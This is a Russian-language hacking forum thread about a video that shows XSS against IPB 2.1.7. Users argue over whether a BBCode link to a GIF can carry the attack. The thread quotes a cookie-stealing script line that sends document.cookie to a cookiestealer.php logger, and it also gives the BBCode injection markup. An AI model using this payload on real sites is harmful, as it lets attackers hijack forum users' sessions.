Недавно на одном из зарубежных порталов скачал видео по демонстрации xss на ipb 2.1.7

Код темы форума хекера был такой


[урлl=http://путь к гиф файлу][имг]просто картинка][/имг]


Gif файл


<SCRIPT>location.href='http://127.0.0.1/cookiestealer.php?cookie='+escape(document.cookie)</SCRIPT>


После обращения к линку у хекеря в логах осталась его сессия.Как такое возможно,если в линке в теме топика не передается документ.куки а те куки что уже в гиф файле будут куки не с форума?

Попробовал на локалхосте,естествено,нуле вой результат ;))

Кому интересно могу даю линк на видео,но в отличие от нас,у них размеры видео начиная с 30 мегов и выше ;)

http://rapidshare.de/files/33563512/Video_4_Hacking-Truths.NeT.rar.html

Ну ведь бред да?

Ты серьёзно или это прикол?
Если серьёзно, тогда сколькие из них повелись на это?
Ещё-бы куки не записались, стилер с форумом и картинкой на одном хосте(127.0.0.1).

hidden это был как пример дан.его кукистилер и форум были на разных хостах.

2gemaglabin у куксов есть необходимое для этого поле - хост)

хыхыхыхых, эх гема-Гема =)

Я перепутал,gifка лежала на сервере с форумом.Какой тогда смысл? ;) closed

[урлl=http://путь к гиф файлу][имг]просто картинка][/имг]
тут тег урл не закрыт,
может на основе "перекрытия" тегов че было, а в гифке код скорее всего куда нить подключается, либо это чейто шутка...посмотри видео еще раз внимательно,
30метров качать не тема